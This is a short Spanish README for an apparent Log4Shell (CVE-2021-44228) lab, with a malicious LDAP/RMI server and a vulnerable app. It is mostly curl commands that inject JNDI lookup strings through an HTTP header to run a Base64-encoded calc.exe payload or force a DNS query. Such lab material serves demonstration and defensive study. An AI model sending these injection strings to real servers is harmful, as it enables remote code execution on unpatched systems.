
Ejemplos de Log4j CVE-2021-44228: Ejecución remota de código (a través de LDAP, RMI, ...), Consultas DNS forzadas, ...
Use un JDK vulnerable, por ejemplo JDK 1.8.0_181
El servidor malicioso despliega los siguientes endpoints:
./gradlew :malicious-server:bootRun
La aplicación vulnerable despliega un endpoint HTTP en 8082
./gradlew :vulnerable-app:bootRun
Elija un payload que será ejecutado por la aplicación vulnerable y codifíquelo en Base64. Como ejemplo, para abrir la calculadora en Windows: calc.exe
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/